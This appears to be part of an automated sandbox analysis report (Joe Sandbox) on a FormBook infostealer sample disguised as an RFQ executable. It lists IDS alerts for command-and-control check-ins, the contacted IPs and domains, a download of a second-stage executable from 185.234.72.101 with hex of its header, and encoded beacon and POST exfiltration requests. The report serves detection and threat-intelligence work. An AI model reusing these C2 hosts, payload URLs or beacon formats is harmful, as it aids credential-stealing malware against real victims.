              Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49750 -> 203.161.55.102:80
              Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49751 -> 203.161.55.102:80
              Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49753 -> 203.161.55.102:80
              Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49758 -> 116.213.43.190:80
              Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49761 -> 116.213.43.190:80
              Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49763 -> 116.213.43.190:80
              Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49764 -> 13.248.169.48:80
              Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49765 -> 13.248.169.48:80
              Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49767 -> 13.248.169.48:80
              Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49768 -> 38.47.232.224:80
              Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49769 -> 38.47.232.224:80
              Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49771 -> 162.241.253.174:80
              Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49772 -> 38.47.232.224:80
              Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49773 -> 35.190.52.58:80
              Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49774 -> 202.95.21.152:80
              Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49775 -> 35.190.52.58:80
              Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49776 -> 202.95.21.152:80
              Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49779 -> 35.190.52.58:80
              Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49780 -> 202.95.21.152:80
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 04 Jul 2024 01:12:30 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Wed, 03 Jul 2024 05:35:30 GMTETag: "f0400-61c5132d1e957"Accept-Ranges: bytesContent-Length: 984064Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ea 3a a0 f5 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 9c 0e 00 00 66 00 00 00 00 00 00 32 bb 0e 00 00 20 00 00 00 c0 0e 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 0f 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 df ba 0e 00 4f 00 00 00 00 c0 0e 00 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0f 00 0c 00 00 00 c0 9d 0e 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 38 9b 0e 00 00 20 00 00 00 9c 0e 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 00 64 00 00 00 c0 0e 00 00 64 00 00 00 9e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 0f 00 00 02 00 00 00 02 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 bb 0e 00 00 00 00 00 48 00 00 00 02 00 05 00 58 6b 00 00 c0 45 00 00 03 00 00 00 35 00 00 06 18 b1 00 00 a8 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 02 00 1a 02 00 00 01 00 00 11 02 16 7d 01 00 00 04 02 73 15 00 00 0a 7d 03 00 00 04 02 14 7d 04 00 00 04 02 28 16 00 00 0a 00 00 02 28 0e 00 00 06 00 02 7b 03 00 00 04 18 6f 17 00 00 0a 00 28 43 00 00 06 14 fe 01 0a 06 2c 62 00 02 7b 05 00 00 04 72 01 00 00 70 6f 18 00 00 0a 00 02 72 01 00 00 70 6f 18 00 00 0a 00 02 7b 0b 00 00 04 28 4a 00 00 06 0b 12 01 28 19 00 00 0a 6f 18 00 00 0a 00 02 7b 12 00 00 04 17 6f 1a 00 00 0a 00 02 7b 15 00 00 04 72 13 00 00 70 6f 18 00 00 0a 00 02 16 7d 02 00 00 04 00 38 55 01 00 00 00 02 17 7d 01 00 00 04 02 7b 05 00 00 04 72 29 00 00 70 6f 18 00 00 0a 00 02 72 29 00 00 70 6f 18 00 00 0a 00 28 43 00 00 06 0c 02 7b 0b 00 00 04 08 6f 58 00 00 06 0b 12 01 28 19 00 00 0a 6f 18 00 00 0a 00 02 7b 0a 00 00 04 08 6f 5a 00 00 06 6f 18 00 00 0a 00 02 7b 09 00 00 04 08 6f 5e 00 00 06 0b 12 01 28 19 00 00 0a 6f 18 00 00 0a 00 02 7b 08 00 00 04 08 6f
              Source: Joe Sandbox ViewIP Address: 202.95.21.152 202.95.21.152
              Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
              Source: Joe Sandbox ViewIP Address: 203.161.55.102 203.161.55.102
              Source: Joe Sandbox ViewASN Name: BCPL-SGBGPNETGlobalASNSG BCPL-SGBGPNETGlobalASNSG
              Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
              Source: Joe Sandbox ViewASN Name: VNPT-AS-VNVNPTCorpVN VNPT-AS-VNVNPTCorpVN
              Source: Joe Sandbox ViewASN Name: INTERHOPCA INTERHOPCA
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: 0_2_00EE25E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_00EE25E2
              Source: global trafficHTTP traffic detected: GET /p1dd/?XHUPe=Ud3TZHA0-F74ZZ&n02X2xPX=G7DDmCfNGXy3uJCEgcIIU1iXFvarFYWbvsRS9sxoYaNScQyM2A1goKEbo8KV9mX8trrejs5AH6YGa7AwDEXag2zD7gw0a+PZJfygUURv+5LCwJWR5NAeUOI= HTTP/1.1Host: www.778981.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Source: global trafficHTTP traffic detected: GET /kfqo/?n02X2xPX=NiOdQOuMLD2zHgMWwKws4JzuutDmLpx3tWxYTf2s7ZGupi3Uz5m5Dts89dE7D44P7JMDqAvEJ+8u+Llyo4b9pPx+fjdmUm+qFImntH+EZRPwIZM2dcS4AHM=&XHUPe=Ud3TZHA0-F74ZZ HTTP/1.1Host: www.binpvae.lolAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Source: global trafficHTTP traffic detected: GET /1kbe/?XHUPe=Ud3TZHA0-F74ZZ&n02X2xPX=tZQfW8UiiNJTf5Fq5WrX9vmmZrioxCoVqMwq5i80b8QJkwpSgFAdETlO4QFSoDRfTxjpMxprnPemrx/P1Sfw5KD2hu+ipHyltaJOhZhwSC5dlgXXfIxM6PM= HTTP/1.1Host: www.a9jcpf.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Source: global trafficHTTP traffic detected: GET /il19/?n02X2xPX=2W0Inf+zka60rkge6x3gGQQeo1iuz6hi+bPXuzv4I1vHSGtqZzoorLZZnoCmwyX2i4rMR0gWWwZYBzao7rAttPu5367SyozTICrQ88OWOZt9joXCP1iWm4I=&XHUPe=Ud3TZHA0-F74ZZ HTTP/1.1Host: www.mhtnvro.lolAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Source: global trafficHTTP traffic detected: GET /ff8d/?XHUPe=Ud3TZHA0-F74ZZ&n02X2xPX=ohJD03igrpR8lwlwc1M4EqZrzingiHicFb+y4T5GGfrPyp+0FgUaOIwicDYxE9IqyQjr9lfiRuNbkNF7eyT6Zergy2OfkJkLywWhdn0W3d/t29Aith2p64g= HTTP/1.1Host: www.lexiecos.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Source: global trafficHTTP traffic detected: GET /VT3g2PdlLRVpwBp.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.234.72.101Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /l8a4/?n02X2xPX=CPL7YN3vcnDyuUFtA6pv3uMhLFbLrJb1JE9LZisFmiEQ0vYrwOGtj9QBvlTfLzXcbjIACE/TYt0vO88JJ7+OI7LCsTQn12dDmlA0tsWVEcE74AqN9n1fFjE=&XHUPe=Ud3TZHA0-F74ZZ HTTP/1.1Host: www.augaqfp.lolAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Source: global trafficHTTP traffic detected: GET /cns4/?XHUPe=Ud3TZHA0-F74ZZ&n02X2xPX=b+X9HsydX2EZhoFbHWDGWLn8qSDjJiBvgg2FVhcLABkhzzs0ucmBPDMRqtKe3XUMFDw5FS9Ji9Imkcb4M+SgV1CrLIKWT8R/LC2e+AlJEb/hHwO3uGNSJEs= HTTP/1.1Host: www.webuyfontana.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Source: global trafficHTTP traffic detected: GET /nce6/?5DGDh=Hn3dOR&b4=Ed8kY/rwObA0p5m5nhu+szHCUNlmSGCiAjj4r6cZewWhLhgYO7hQm/tRjsXvcwXKbbEnwnHnz6fwjIdmgc2mtcrqJn2XJ43mDBubdDmUHoysA9KOkH3v2hY= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.ndhockeyprospects.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
              Source: global trafficHTTP traffic detected: GET /rmef/?n02X2xPX=UdI5Nug9LeCq3QKyZxAFTuhDHYNaCA3T0/tR5L8b4jWaA2fUCVH3fLw1ebDEBIsiTWaLxfrgjTz4bD/84RJrNmZZ6yqPN++//ptV/K/4BOxQ2TPEoKO+wL0=&XHUPe=Ud3TZHA0-F74ZZ HTTP/1.1Host: www.ytw6.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Source: global trafficHTTP traffic detected: GET /2e2r/?n02X2xPX=0euIbLTFP3+EyEtzvor9i8vHBXpYgQpCpm4T5C+2kVz8Gw9LnD+VjddQp9QTALZxA8pe/VRvpSGAU2oGCWkdjrfpA+HWsjyp03alRT8mG3hS2I+8+ag3/fo=&XHUPe=Ud3TZHA0-F74ZZ HTTP/1.1Host: www.hsck520.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Source: global trafficHTTP traffic detected: GET /3in6/?b4=Beo4F/wq8RdFDjebPnHj1X0mxngmjMMrNdTrW7vwt6cBBJ1fMwEGjCkFOHv2gXsTpd06O+ghlGNN6L13Yf+5YaxQqqrS/i2qyCLFr7bAJDv3UDERmc5Em7s=&5DGDh=Hn3dOR HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.qmancha.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
              Source: global trafficDNS traffic detected: DNS query: www.778981.com
              Source: global trafficDNS traffic detected: DNS query: www.binpvae.lol
              Source: global trafficDNS traffic detected: DNS query: www.byteffederal.com
              Source: global trafficDNS traffic detected: DNS query: www.jjkelker.com
              Source: global trafficDNS traffic detected: DNS query: www.a9jcpf.top
              Source: global trafficDNS traffic detected: DNS query: www.mhtnvro.lol
              Source: global trafficDNS traffic detected: DNS query: www.lexiecos.top
              Source: global trafficDNS traffic detected: DNS query: www.augaqfp.lol
              Source: global trafficDNS traffic detected: DNS query: www.webuyfontana.com
              Source: global trafficDNS traffic detected: DNS query: www.ytw6.top
              Source: global trafficDNS traffic detected: DNS query: www.ndhockeyprospects.com
              Source: global trafficDNS traffic detected: DNS query: www.caroinapottery.com
              Source: global trafficDNS traffic detected: DNS query: www.hsck520.com
              Source: global trafficDNS traffic detected: DNS query: www.qmancha.com
              Source: global trafficDNS traffic detected: DNS query: www.mebutnotme.store
              Source: global trafficDNS traffic detected: DNS query: www.cloud-force.club
              Source: unknownHTTP traffic detected: POST /kfqo/ HTTP/1.1Host: www.binpvae.lolAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USAccept-Encoding: gzip, deflate, brOrigin: http://www.binpvae.lolReferer: http://www.binpvae.lol/kfqo/Cache-Control: no-cacheContent-Type: application/x-www-form-urlencodedContent-Length: 205Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Data Raw: 6e 30 32 58 32 78 50 58 3d 41 67 6d 39 54 37 44 4b 4d 41 32 38 4e 6e 70 74 34 4c 63 69 39 59 44 36 6f 74 7a 43 42 4c 67 71 74 32 70 78 59 36 58 41 35 71 79 75 6c 48 44 64 31 49 36 6e 44 4d 51 65 6d 34 70 57 4f 59 31 35 37 4c 59 70 78 30 50 54 51 63 73 48 6d 5a 34 4c 6a 4c 6a 43 2b 70 78 77 4d 77 42 77 52 55 32 6d 54 59 50 66 73 6e 69 45 4f 47 2f 47 4e 73 6f 62 63 38 2b 44 49 31 74 6b 55 69 58 32 70 78 54 56 61 4e 75 54 39 72 2b 58 35 4c 34 58 74 6f 74 6f 73 34 48 4a 4c 67 4a 46 67 45 47 6e 4c 57 5a 61 43 49 38 34 66 57 4e 51 56 55 6e 78 4a 6b 51 6f 41 41 35 4d 72 6a 41 6a 35 48 50 4f 57 49 31 68 4c 77 3d 3d Data Ascii: n02X2xPX=Agm9T7DKMA28Nnpt4Lci9YD6otzCBLgqt2pxY6XA5qyulHDd1I6nDMQem4pWOY157LYpx0PTQcsHmZ4LjLjC+pxwMwBwRU2mTYPfsniEOG/GNsobc8+DI1tkUiX2pxTVaNuT9r+X5L4Xtotos4HJLgJFgEGnLWZaCI84fWNQVUnxJkQoAA5MrjAj5HPOWI1hLw==
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jul 2024 01:12:17 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jul 2024 01:12:19 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jul 2024 01:12:22 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
